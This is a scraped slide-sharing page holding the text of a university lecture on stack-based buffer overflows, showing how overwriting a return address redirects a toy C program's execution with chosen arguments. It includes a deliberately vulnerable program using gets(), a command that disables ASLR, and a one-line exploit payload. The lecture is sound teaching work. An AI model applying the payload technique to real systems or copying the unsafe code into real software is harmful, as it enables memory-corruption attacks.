cse 610 special topics system security attack and defense
play

CSE 610 Special Topics: System Security - Attack and Defense for - PowerPoint PPT Presentation

Apr 17, 2023 •139 likes •873 views

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming Zhao Location: Online Time: Monday, 5:20 PM - 8:10 PM Last Class 1. Stack-based buffer overflow-1 a. Brief history of buffer overflow b.

  1. CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming Zhao Location: Online Time: Monday, 5:20 PM - 8:10 PM

  2. Last Class 1. Stack-based buffer overflow-1 a. Brief history of buffer overflow b. Program variables (global, local, initialized, uninitialized) c. C calling conventions (x86, x86-64) d. Overflow local variables e. Overflow RET address to call a function

  3. Homework-2 Hw-2 walkthrough

  4. Today’s Agenda 1. Stack-based buffer overflow-2 a. Overflow RET and return to a function with parameters (32-bit) b. Overflow to return/call multiple functions with parameters (32-bit) c. Overflow with shellcode (32-bit and 64 bit)

  5. Draw the stack (x86 cdecl)

  6. X86 Stack Usage ● Accesses local variables (negative indexing over ebp) mov -0x8(%ebp), %eax value at ebp-0x8 lea -0x24(%ebp), %eax address as ebp-0x24 ● Stores function arguments from caller (positive indexing over ebp) mov 0x8(%ebp), %eax 1st arg mov 0xc(%ebp), %eax 2nd arg ● Positive indexing over esp Function arguments to callee

  7. amd64 Stack Usage ● Access local variables (negative indexing over rbp) mov -0x8(%rbp), %rax lea -0x24(%rbp), %rax ● Access function arguments from caller mov %rdi, %rax ● Setup parameters for callee mov %rax, %rdi

  8. Conditions we depend on to pull off the attack of returning to a function in the address space 1. The function is already in the address space 2. The ability to overwrite RET addr on stack before instruction ret is executed 3. Know the address of the destination function 4. The ability to set up arguments (32-bit on stack; 64-bit in register)

  9. Insecure C functions strcpy(), memcpy(), gets(), ... https://github.com/intel/safestringlib/wiki/SDL-List-of-Banned-Functions

  10. Return to a function with parameter(s)

  11. Buffer Overflow Example: code/overflowret2 int printsecret(int i) { if (i == 0x12345678) printf("Congratulations! You made it!\n"); else printf("I pity the fool!\n"); exit(0);} int vulfoo() { char buf[6]; gets(buf); return 0;} int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); } Use “echo 0 | sudo tee /proc/sys/kernel/randomize_va_space” on Ubuntu to disable ASLR temporarily

  12. ... int printsecret(int i) ... { if (i == 0x12345678) RET printf("Congratulations! You made it!\n"); Saved EBP else %ebp printf("I pity the fool!\n"); buf exit(0);} int vulfoo() { char buf[6]; gets(buf); return 0;} int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  13. ... int printsecret(int i) ... { if (i == 0x12345678) Addr of printsecret printf("Congratulations! You made it!\n"); AAAA else %ebp printf("I pity the fool!\n"); buf exit(0);} int vulfoo() { char buf[6]; gets(buf); return 0;} int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  14. ... int printsecret(int i) ... { if (i == 0x12345678) Addr of printsecret printf("Congratulations! You made it!\n"); AAAA else %esp, %ebp printf("I pity the fool!\n"); buf exit(0);} int vulfoo() { char buf[6]; mov %ebp, %esp gets(buf); pop %ebp return 0;} ret int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  15. ... int printsecret(int i) ... { %ebp = AAAA if (i == 0x12345678) Addr of printsecret printf("Congratulations! You made %esp it!\n"); AAAA else printf("I pity the fool!\n"); buf exit(0);} int vulfoo() { char buf[6]; mov %ebp, %esp gets(buf); pop %ebp return 0;} ret int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  16. ... %ebp = AAAA int printsecret(int i) ... { %esp if (i == 0x12345678) Addr of printsecret printf("Congratulations! You made it!\n"); AAAA else printf("I pity the fool!\n"); %eip = Addr of printsecret buf exit(0);} int vulfoo() { char buf[6]; mov %ebp, %esp gets(buf); pop %ebp return 0;} ret int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  17. ... %ebp = AAAA int printsecret(int i) ... { if (i == 0x12345678) AAAA printf("Congratulations! You made %esp it!\n"); AAAA else printf("I pity the fool!\n"); buf exit(0);} int vulfoo() { push %ebp char buf[6]; mov %esp, %ebp gets(buf); return 0;} int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  18. ... int printsecret(int i) ... { if (i == 0x12345678) AAAA printf("Congratulations! You made %ebp, %esp it!\n"); AAAA else printf("I pity the fool!\n"); buf exit(0);} int vulfoo() { push %ebp char buf[6]; mov %esp, %ebp gets(buf); return 0;} int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  19. i: Parameter1 int printsecret(int i) RET { if (i == 0x12345678) AAAA: saved EBP printf("Congratulations! You made %ebp, %esp it!\n"); AAAA else printf("I pity the fool!\n"); buf exit(0);} int vulfoo() { char buf[6]; gets(buf); return 0;} int main(int argc, char *argv[]) Address of i to overwrite: { Buf + sizeof(buf) + 12 printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  20. Overwrite RET and More 0x12345678 int printsecret(int i) Does not matter { if (i == 0x12345678) Addr of printsecret printf("Congratulations! You made it!\n"); Does not matter else %ebp printf("I pity the fool!\n"); %eax buf exit(0);} int vulfoo() { char buf[6]; gets(buf); return 0;} int main(int argc, char *argv[]) Exploit will be something like: { printf("The addr of printsecret is %p\n", python -c "print 'A'*18+'\x2d\x62\x55\x56' + 'A'*4 + '\x78\x56\x34\x12'" | ./or2 printsecret); vulfoo(); printf("I pity the fool!\n"); }

  21. Overwrite RET and More 0x12345678 int printsecret(int i) Does not matter { if (i == 0x12345678) Addr of printsecret printf("Congratulations! You made it!\n"); Does not matter else %ebp printf("I pity the fool!\n"); %eax buf exit(0);} int vulfoo() { char buf[6]; gets(buf); return 0;} int main(int argc, char *argv[]) Exploit will be something like: { printf("The addr of printsecret is %p\n", python -c "print 'A'*18+'\x2d\x62\x55\x56' + 'A'*4 + '\x78\x56\x34\x12'" | ./or2 printsecret); vulfoo(); printf("I pity the fool!\n"); }

  22. Return to function with many arguments? j: Parameter2 i: Parameter1 int printsecret(int i, int j) RET { if (i == 0x12345678 && j == 0xdeadbeef) AAAA: saved EBP printf("Congratulations! You made %ebp, %esp it!\n"); AAAA else printf("I pity the fool!\n"); buf exit(0);} int vulfoo() { char buf[6]; gets(buf); return 0;} int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  23. Buffer Overflow Example: code/overflowret3 int printsecret(int i, int j) { if (i == 0x12345678 && j == 0xdeadbeef) printf("Congratulations! You made it!\n"); else printf("I pity the fool!\n"); exit(0);} int vulfoo() { char buf[6]; gets(buf); return 0;} int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); } Use “echo 0 | sudo tee /proc/sys/kernel/randomize_va_space” on Ubuntu to disable ASLR temporarily

  24. Can we return to a chain of functions?

  25. (32 bit) Return to multiple functions? 1. Before epilogue of vulfoo arg-v-2 arg-v-1 Can RET = f1 overwrite once Saved EBP = A %ebp Padding buf

  26. (32 bit) Return to multiple functions? 1. Before 2. After epilogue of epilogue of vulfoo vulfoo arg-v-2 arg-v-2 arg-v-1 arg-v-1 %esp RET = f1 RET = f1 %ebp Saved EBP = Saved EBP = = A A A %ebp Padding Padding %eip = f1 buf buf

  27. (32 bit) Return to multiple functions? 3. after prologue of f1 1. Before 2. After epilogue of epilogue of arg-f1-2 vulfoo vulfoo arg-v-2 arg-v-2 arg-f1-1 arg-v-1 arg-v-1 RET = f2 %esp Saved EBP = RET = f1 RET = f1 %ebp A %ebp Saved EBP = Saved EBP = Saved EBP = = A A A A %ebp Padding Padding Padding %eip = f1 buf buf buf

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming Zhao Location: Frnczk 408, North campus Time: Monday, 5:20 PM - 8:10 PM Todays Agenda 1. Cache side channel attack Speed Gap Between CPU and

535 views • 42 slides
CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming Zhao Location: Frnczk 408, North campus Time: Monday, 5:20 PM - 8:10 PM Last Class 1. Defenses a. Direct defense b. Stack Cookie; Canary -

713 views • 26 slides
CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming Zhao Location: Frnczk 408, North campus Time: Monday, 5:20 PM - 8:10 PM Last Class 1. Defenses a. Address Space Layout Randomization (ASLR)

872 views • 19 slides
CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming Zhao Location: Online Time: Monday, 5:20 PM - 8:10 PM First off, Logistics! Turn on camera if possible Classes are recorded and released

1.42k views • 116 slides
CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming Zhao Location: Frnczk 408, North campus Time: Monday, 5:20 PM - 8:10 PM Announcements 1. Final Exam : 12/14 2020 7:15PM-10:15PM. Same format as

483 views • 15 slides
Network Security CIA +Availability By Jinjian Ma Topics DOS/DDoS Detection & Defense

Network Security CIA +Availability By Jinjian Ma Topics DOS/DDoS Detection & Defense

Network Security CIA +Availability By Jinjian Ma Topics DOS/DDoS Detection & Defense Prevention DOS/DDoS Types Vulnerability attack Flooding attack DoS vs DDoS DoS: Attack is launched from single host Less

614 views • 26 slides
ss 8 Class Cl CSC 495/583 Topics of Software Security PLT, GOT & Return-to-plt Attack

ss 8 Class Cl CSC 495/583 Topics of Software Security PLT, GOT & Return-to-plt Attack

ss 8 Class Cl CSC 495/583 Topics of Software Security PLT, GOT & Return-to-plt Attack & GOT Overwrite Attack Dr. Si Chen (schen@wcupa.edu) Review Page 2 ret2libc Attack Page 3 libc C standard library Provides

662 views • 36 slides
Serverless security: attack & defense www.securing.pl #whoami Senior Security Consultant in

Serverless security: attack & defense www.securing.pl #whoami Senior Security Consultant in

www.securing.pl Pawel Rzepa Serverless security: attack & defense www.securing.pl #whoami Senior Security Consultant in - Pentesting - Cloud security assessment Blog: https://medium.com/@rzepsky @Rzepsky

1.1k views • 63 slides
Attacking JAVA Serialized Communication Manish S. Saindane Who am I ? Security Researcher

Attacking JAVA Serialized Communication Manish S. Saindane Who am I ? Security Researcher

ATTACK & & ATTACK labs DEFENSE DEFENSE Attacking JAVA Serialized Communication Manish S. Saindane Who am I ? Security Researcher Working as a Lead Applica8on Security Specialist for an interna8onal so:ware development and

577 views • 28 slides
Preview question Which of these defense techniques would completely prevent a ROP attack from

Preview question Which of these defense techniques would completely prevent a ROP attack from

Preview question Which of these defense techniques would completely prevent a ROP attack from returning from an intended CSci 5271 return instruction to an unintended gadget? Introduction to Computer Security A. ASLR Day 6: Low-level defenses

125 views • 9 slides
Exploit Development 101 ATTACK & DEFENSE HISTORY OF WINDOWS BUFFER OVERFLOW Peter Chi

Exploit Development 101 ATTACK & DEFENSE HISTORY OF WINDOWS BUFFER OVERFLOW Peter Chi

Exploit Development 101 ATTACK & DEFENSE HISTORY OF WINDOWS BUFFER OVERFLOW Peter Chi chiwp@tw.ibm.com 2020/08/11 About Me IBM CDL Software Engineer Columbia Univ. Master of Science Computer Security Track OSCP / OSCE / eWPT /

1.11k views • 22 slides
Towards Attack-Agnostic Defense for 2D and 3D Recognition Hao Su Workshop on Adversarial Machine

Towards Attack-Agnostic Defense for 2D and 3D Recognition Hao Su Workshop on Adversarial Machine

Towards Attack-Agnostic Defense for 2D and 3D Recognition Hao Su Workshop on Adversarial Machine Learning in Real-World Computer Vision Systems Long Beach, CA, USA 1 Outline Background and Motivation Project-based Defense Mechanism

760 views • 72 slides
Web security With material from Dave Levin, Mike Hicks, Lujo Bauer Previously Attack and

Web security With material from Dave Levin, Mike Hicks, Lujo Bauer Previously Attack and

Web security With material from Dave Levin, Mike Hicks, Lujo Bauer Previously Attack and defense at host machines Applications written in C and C++ Violations of memory safety Web security now Attacking web services

830 views • 37 slides
CMPSC 497 Special Topics: Software Security Trent Jaeger Systems and Internet

CMPSC 497 Special Topics: Software Security Trent Jaeger Systems and Internet

Systems and Internet Infrastructure Security Network and Security Research Center Department of Computer Science and Engineering Pennsylvania State University, University Park PA CMPSC 497 Special Topics: Software Security Trent Jaeger

745 views • 27 slides
Protection and Security Threat is potential security violation Attack is attempt to breach

Protection and Security Threat is potential security violation Attack is attempt to breach

CSC 4103 - Operating Systems The Security Problem Spring 2007 Security must consider external environment of the system, and protect the system resources Lecture - XX Intruders (crackers) attempt to breach security Protection and

195 views • 4 slides
Surveillance Defense Small Easy Steps for Security and Privacy Pete Snyder psnyde2@uic.edu -

Surveillance Defense Small Easy Steps for Security and Privacy Pete Snyder psnyde2@uic.edu -

Surveillance Defense Small Easy Steps for Security and Privacy Pete Snyder psnyde2@uic.edu - peteresnyder.com Surveillance Defense 1. Good Practices 2. System / PC Security 3. Mobile Security 4. Browser Security 5. Secure Networking Tools

443 views • 27 slides
Adversarial Regression with Multiple Learners Liang Tong 1 Sixie Yu 1 Scott Alfeld 2

Adversarial Regression with Multiple Learners Liang Tong 1 Sixie Yu 1 Scott Alfeld 2

Adversarial Regression with Multiple Learners Liang Tong 1 Sixie Yu 1 Scott Alfeld 2 Yevgeniy Vorobeychik 1 1 Electrical Engineering and Computer Science Vanderbilt University 2 Computer Science Amherst College ICML 2018 ( Electrical

3.32k views • 27 slides
Scientific Computing I Conclusion and Outlook Michael Bader Lehrstuhl Informatik V Winter

Scientific Computing I Conclusion and Outlook Michael Bader Lehrstuhl Informatik V Winter

Scientific Computing I Michael Bader The Simulation Pipeline Scientific Computing I Conclusion and Outlook Michael Bader Lehrstuhl Informatik V Winter 2005/2006 Scientific The Simulation Pipeline Computing I Michael Bader The

522 views • 20 slides
Atheist Day What Type of Fool Are You? The Fool Proper The fool says in his heart, There

Atheist Day What Type of Fool Are You? The Fool Proper The fool says in his heart, There

Atheist Day What Type of Fool Are You? The Fool Proper The fool says in his heart, There is no God. Psalm 14:1 (ESV) What Type of Fool Are You? The Fool Proper And he[Jesus] told them a parable, saying, The land of a rich

417 views • 16 slides
Verification Techniques for Object Invariants Peter Mller Microsoft Research Joint work with

Verification Techniques for Object Invariants Peter Mller Microsoft Research Joint work with

A Unified Framework for Verification Techniques for Object Invariants Peter Mller Microsoft Research Joint work with Sophia Drossopoulou and Adrian Francalanza 2 Object Invariants Express consistency criteria of objects Support

503 views • 18 slides
OpenStack based telco clouds Todays Panel Sunil Sood Moderator Ericsson VP, IT & Cloud

OpenStack based telco clouds Todays Panel Sunil Sood Moderator Ericsson VP, IT & Cloud

OpenStack Summit - Sydney I pity the fool that builds his own cloud. Panel Discussion Ericsson (Moderator) AT&T SKT Overcoming NTT challenges of OpenStack based telco clouds Todays Panel Sunil Sood Moderator Ericsson VP, IT

724 views • 7 slides
Words & their Meaning: Distributional Semantics CMSC 470 Marine Carpuat Slides credit: Dan

Words & their Meaning: Distributional Semantics CMSC 470 Marine Carpuat Slides credit: Dan

Words & their Meaning: Distributional Semantics CMSC 470 Marine Carpuat Slides credit: Dan Jurafsky Reminders Read the syllabus Respond to office hour survey on piazza TODAY Get started on homework 1 due Tue Sep 3 by 1:00pm

616 views • 40 slides
by learning the Distributions of Adversarial Examples Boqing Gong Joint work with Yandong Li,

by learning the Distributions of Adversarial Examples Boqing Gong Joint work with Yandong Li,

by learning the Distributions of Adversarial Examples Boqing Gong Joint work with Yandong Li, Lijun Li, Liqiang Wang, & Tong Zhang Published in ICML 2019 Intriguing properties of deep neural networks (DNNs) Szegedy, C., Zaremba, W.,

750 views • 43 slides
CloudLeak: Large-Scale Deep Learning Models Stealing Through Adversarial Examples Honggang Yu 1 ,

CloudLeak: Large-Scale Deep Learning Models Stealing Through Adversarial Examples Honggang Yu 1 ,

CloudLeak: Large-Scale Deep Learning Models Stealing Through Adversarial Examples Honggang Yu 1 , Kaichen Yang 1 , Teng Zhang 2 , Yun-Yun Tsai 3 , Tsung-Yi Ho 3 , Yier Jin 1 1 University of Florida, 2 University of Central Florida, 3 National

468 views • 23 slides

More recommend